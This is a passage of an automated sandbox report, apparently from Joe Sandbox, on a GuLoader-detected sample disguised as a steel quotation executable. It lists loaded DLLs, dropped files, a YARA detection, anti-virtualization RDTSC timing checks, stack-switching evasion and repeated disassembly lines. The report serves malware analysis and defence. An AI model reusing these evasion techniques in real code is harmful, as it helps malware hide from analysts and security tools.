            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeFile written: C:\Users\user\AppData\Roaming\Rigsantikvarernes\anticipatively.iniJump to behavior
            Source: Binary string: mshtml.pdb source: Steel Sample- QUOTE.exe, 00000006.00000001.2207372084.0000000000649000.00000020.00000001.01000000.00000007.sdmp
            Source: Binary string: wntdll.pdbUGP source: Steel Sample- QUOTE.exe, 00000006.00000003.2519869425.000000003506A000.00000004.00000020.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000002.3332139420.00000000353AE000.00000040.00001000.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000002.3332139420.0000000035210000.00000040.00001000.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000003.2518236635.0000000034EBE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Steel Sample- QUOTE.exe, Steel Sample- QUOTE.exe, 00000006.00000003.2519869425.000000003506A000.00000004.00000020.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000002.3332139420.00000000353AE000.00000040.00001000.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000002.3332139420.0000000035210000.00000040.00001000.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000003.2518236635.0000000034EBE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mshtml.pdbUGP source: Steel Sample- QUOTE.exe, 00000006.00000001.2207372084.0000000000649000.00000020.00000001.01000000.00000007.sdmp
            Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: 4KXbBCJB2PUOofMF0XAGHYJ.exe, 0000000E.00000002.2962917710.00000000001AF000.00000002.00000001.01000000.00000008.sdmp, 4KXbBCJB2PUOofMF0XAGHYJ.exe, 0000000F.00000002.2962988596.00000000001AF000.00000002.00000001.01000000.00000008.sdmp, 4KXbBCJB2PUOofMF0XAGHYJ.exe, 00000011.00000000.2753551476.00000000001AF000.00000002.00000001.01000000.00000008.sdmp, 4KXbBCJB2PUOofMF0XAGHYJ.exe, 00000012.00000000.2873144572.00000000001AF000.00000002.00000001.01000000.00000008.sdmp

            Data Obfuscation

            barindex
            Yara detected GuLoader
            Source: Yara matchFile source: 00000006.00000002.2962810507.0000000002234000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2215456819.0000000005564000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406252
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 0_2_10002DB0 push eax; ret 0_2_10002DDE
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3521135D push eax; iretd 6_2_35211369
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352127FA pushad ; ret 6_2_352127F9
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeFile created: C:\Users\user\AppData\Local\Temp\nsf64C1.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeAPI/Special instruction interceptor: Address: 57219D3
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeAPI/Special instruction interceptor: Address: 23F19D3
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeRDTSC instruction interceptor: First address: 56E4548 second address: 56E4548 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FCEA88846A5h 0x00000006 test bh, FFFFFFA8h 0x00000009 cmp bl, cl 0x0000000b inc ebp 0x0000000c inc ebx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeRDTSC instruction interceptor: First address: 23B4548 second address: 23B4548 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FCEA8C56995h 0x00000006 test bh, FFFFFFA8h 0x00000009 cmp bl, cl 0x0000000b inc ebp 0x0000000c inc ebx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352BD1C0 rdtsc 6_2_352BD1C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsf64C1.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeAPI coverage: 0.3 %
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405770
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 0_2_0040622B FindFirstFileW,FindClose,0_2_0040622B
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 0_2_0040276E FindFirstFileW,0_2_0040276E
            Source: Steel Sample- QUOTE.exe, 00000006.00000003.2518545441.000000000505C000.00000004.00000020.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000002.3297486628.000000000505C000.00000004.00000020.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000003.2518463210.000000000505C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Steel Sample- QUOTE.exe, 00000006.00000002.3297422474.0000000005008000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeAPI call chain: ExitProcess graph end nodegraph_0-4483
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeAPI call chain: ExitProcess graph end nodegraph_0-4489
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352BD1C0 rdtsc 6_2_352BD1C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352835C0 NtCreateMutant,LdrInitializeThunk,6_2_352835C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406252
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352FB52F mov eax, dword ptr fs:[00000030h]6_2_352FB52F
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35315537 mov eax, dword ptr fs:[00000030h]6_2_35315537
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352EF525 mov eax, dword ptr fs:[00000030h]6_2_352EF525
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352EF525 mov eax, dword ptr fs:[00000030h]6_2_352EF525
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352EF525 mov eax, dword ptr fs:[00000030h]6_2_352EF525
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352EF525 mov eax, dword ptr fs:[00000030h]6_2_352EF525
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352EF525 mov eax, dword ptr fs:[00000030h]6_2_352EF525
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352EF525 mov eax, dword ptr fs:[00000030h]6_2_352EF525
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352EF525 mov eax, dword ptr fs:[00000030h]6_2_352EF525
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3524D534 mov eax, dword ptr fs:[00000030h]6_2_3524D534
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3524D534 mov eax, dword ptr fs:[00000030h]6_2_3524D534
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3524D534 mov eax, dword ptr fs:[00000030h]6_2_3524D534
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3524D534 mov eax, dword ptr fs:[00000030h]6_2_3524D534
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3524D534 mov eax, dword ptr fs:[00000030h]6_2_3524D534
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3524D534 mov eax, dword ptr fs:[00000030h]6_2_3524D534
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3527D530 mov eax, dword ptr fs:[00000030h]6_2_3527D530
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3527D530 mov eax, dword ptr fs:[00000030h]6_2_3527D530
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35277505 mov eax, dword ptr fs:[00000030h]6_2_35277505
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35277505 mov ecx, dword ptr fs:[00000030h]6_2_35277505
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523B562 mov eax, dword ptr fs:[00000030h]6_2_3523B562
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3527B570 mov eax, dword ptr fs:[00000030h]6_2_3527B570
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3527B570 mov eax, dword ptr fs:[00000030h]6_2_3527B570
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352EB550 mov eax, dword ptr fs:[00000030h]6_2_352EB550
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352EB550 mov eax, dword ptr fs:[00000030h]6_2_352EB550
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352EB550 mov eax, dword ptr fs:[00000030h]6_2_352EB550
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_353135B6 mov eax, dword ptr fs:[00000030h]6_2_353135B6
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352615A9 mov eax, dword ptr fs:[00000030h]6_2_352615A9
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352615A9 mov eax, dword ptr fs:[00000030h]6_2_352615A9
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352615A9 mov eax, dword ptr fs:[00000030h]6_2_352615A9
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352615A9 mov eax, dword ptr fs:[00000030h]6_2_352615A9
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352615A9 mov eax, dword ptr fs:[00000030h]6_2_352615A9
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352FF5BE mov eax, dword ptr fs:[00000030h]6_2_352FF5BE
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3526F5B0 mov eax, dword ptr fs:[00000030h]6_2_3526F5B0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3526F5B0 mov eax, dword ptr fs:[00000030h]6_2_3526F5B0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3526F5B0 mov eax, dword ptr fs:[00000030h]6_2_3526F5B0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3526F5B0 mov eax, dword ptr fs:[00000030h]6_2_3526F5B0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3526F5B0 mov eax, dword ptr fs:[00000030h]6_2_3526F5B0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3526F5B0 mov eax, dword ptr fs:[00000030h]6_2_3526F5B0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3526F5B0 mov eax, dword ptr fs:[00000030h]6_2_3526F5B0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3526F5B0 mov eax, dword ptr fs:[00000030h]6_2_3526F5B0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3526F5B0 mov eax, dword ptr fs:[00000030h]6_2_3526F5B0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352D35BA mov eax, dword ptr fs:[00000030h]6_2_352D35BA
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352D35BA mov eax, dword ptr fs:[00000030h]6_2_352D35BA
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352D35BA mov eax, dword ptr fs:[00000030h]6_2_352D35BA
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352D35BA mov eax, dword ptr fs:[00000030h]6_2_352D35BA
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352DD5B0 mov eax, dword ptr fs:[00000030h]6_2_352DD5B0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352DD5B0 mov eax, dword ptr fs:[00000030h]6_2_352DD5B0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523758F mov eax, dword ptr fs:[00000030h]6_2_3523758F
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523758F mov eax, dword ptr fs:[00000030h]6_2_3523758F
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523758F mov eax, dword ptr fs:[00000030h]6_2_3523758F
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352CB594 mov eax, dword ptr fs:[00000030h]6_2_352CB594
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352CB594 mov eax, dword ptr fs:[00000030h]6_2_352CB594
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352615F4 mov eax, dword ptr fs:[00000030h]6_2_352615F4
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352615F4 mov eax, dword ptr fs:[00000030h]6_2_352615F4
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352615F4 mov eax, dword ptr fs:[00000030h]6_2_352615F4
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352615F4 mov eax, dword ptr fs:[00000030h]6_2_352615F4
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352615F4 mov eax, dword ptr fs:[00000030h]6_2_352615F4
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352615F4 mov eax, dword ptr fs:[00000030h]6_2_352615F4
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_353135D7 mov eax, dword ptr fs:[00000030h]6_2_353135D7
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_353135D7 mov eax, dword ptr fs:[00000030h]6_2_353135D7
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_353135D7 mov eax, dword ptr fs:[00000030h]6_2_353135D7
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352755C0 mov eax, dword ptr fs:[00000030h]6_2_352755C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_353155C9 mov eax, dword ptr fs:[00000030h]6_2_353155C9
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352BD5D0 mov eax, dword ptr fs:[00000030h]6_2_352BD5D0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352BD5D0 mov ecx, dword ptr fs:[00000030h]6_2_352BD5D0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352695DA mov eax, dword ptr fs:[00000030h]6_2_352695DA
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3526340D mov eax, dword ptr fs:[00000030h]6_2_3526340D
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352C7410 mov eax, dword ptr fs:[00000030h]6_2_352C7410
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35241460 mov eax, dword ptr fs:[00000030h]6_2_35241460
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35241460 mov eax, dword ptr fs:[00000030h]6_2_35241460
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35241460 mov eax, dword ptr fs:[00000030h]6_2_35241460
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35241460 mov eax, dword ptr fs:[00000030h]6_2_35241460
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35241460 mov eax, dword ptr fs:[00000030h]6_2_35241460
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3525F460 mov eax, dword ptr fs:[00000030h]6_2_3525F460
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3525F460 mov eax, dword ptr fs:[00000030h]6_2_3525F460
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3525F460 mov eax, dword ptr fs:[00000030h]6_2_3525F460
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3525F460 mov eax, dword ptr fs:[00000030h]6_2_3525F460
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3525F460 mov eax, dword ptr fs:[00000030h]6_2_3525F460
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3525F460 mov eax, dword ptr fs:[00000030h]6_2_3525F460
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3531547F mov eax, dword ptr fs:[00000030h]6_2_3531547F
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3524B440 mov eax, dword ptr fs:[00000030h]6_2_3524B440
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3524B440 mov eax, dword ptr fs:[00000030h]6_2_3524B440
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3524B440 mov eax, dword ptr fs:[00000030h]6_2_3524B440
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3524B440 mov eax, dword ptr fs:[00000030h]6_2_3524B440
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3524B440 mov eax, dword ptr fs:[00000030h]6_2_3524B440
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3524B440 mov eax, dword ptr fs:[00000030h]6_2_3524B440
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352FF453 mov eax, dword ptr fs:[00000030h]6_2_352FF453
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352EB450 mov eax, dword ptr fs:[00000030h]6_2_352EB450
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352EB450 mov eax, dword ptr fs:[00000030h]6_2_352EB450
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352EB450 mov eax, dword ptr fs:[00000030h]6_2_352EB450
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352EB450 mov eax, dword ptr fs:[00000030h]6_2_352EB450
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352374B0 mov eax, dword ptr fs:[00000030h]6_2_352374B0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352374B0 mov eax, dword ptr fs:[00000030h]6_2_352374B0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352734B0 mov eax, dword ptr fs:[00000030h]6_2_352734B0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352E74B0 mov eax, dword ptr fs:[00000030h]6_2_352E74B0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35249486 mov eax, dword ptr fs:[00000030h]6_2_35249486
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35249486 mov eax, dword ptr fs:[00000030h]6_2_35249486
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523B480 mov eax, dword ptr fs:[00000030h]6_2_3523B480
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352E94E0 mov eax, dword ptr fs:[00000030h]6_2_352E94E0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_353154DB mov eax, dword ptr fs:[00000030h]6_2_353154DB
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352FF72E mov eax, dword ptr fs:[00000030h]6_2_352FF72E
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35243720 mov eax, dword ptr fs:[00000030h]6_2_35243720
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3525F720 mov eax, dword ptr fs:[00000030h]6_2_3525F720
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3525F720 mov eax, dword ptr fs:[00000030h]6_2_3525F720
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3525F720 mov eax, dword ptr fs:[00000030h]6_2_3525F720
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3531B73C mov eax, dword ptr fs:[00000030h]6_2_3531B73C
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3531B73C mov eax, dword ptr fs:[00000030h]6_2_3531B73C
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3531B73C mov eax, dword ptr fs:[00000030h]6_2_3531B73C
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3531B73C mov eax, dword ptr fs:[00000030h]6_2_3531B73C
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35239730 mov eax, dword ptr fs:[00000030h]6_2_35239730
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35239730 mov eax, dword ptr fs:[00000030h]6_2_35239730
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35275734 mov eax, dword ptr fs:[00000030h]6_2_35275734
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3530972B mov eax, dword ptr fs:[00000030h]6_2_3530972B
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3524973A mov eax, dword ptr fs:[00000030h]6_2_3524973A
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3524973A mov eax, dword ptr fs:[00000030h]6_2_3524973A
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35245702 mov eax, dword ptr fs:[00000030h]6_2_35245702
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35245702 mov eax, dword ptr fs:[00000030h]6_2_35245702
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35247703 mov eax, dword ptr fs:[00000030h]6_2_35247703
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3527F71F mov eax, dword ptr fs:[00000030h]6_2_3527F71F
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3527F71F mov eax, dword ptr fs:[00000030h]6_2_3527F71F
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523B765 mov eax, dword ptr fs:[00000030h]6_2_3523B765
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523B765 mov eax, dword ptr fs:[00000030h]6_2_3523B765
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523B765 mov eax, dword ptr fs:[00000030h]6_2_3523B765
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523B765 mov eax, dword ptr fs:[00000030h]6_2_3523B765
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35253740 mov eax, dword ptr fs:[00000030h]6_2_35253740
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35253740 mov eax, dword ptr fs:[00000030h]6_2_35253740
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35253740 mov eax, dword ptr fs:[00000030h]6_2_35253740
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352E375F mov eax, dword ptr fs:[00000030h]6_2_352E375F
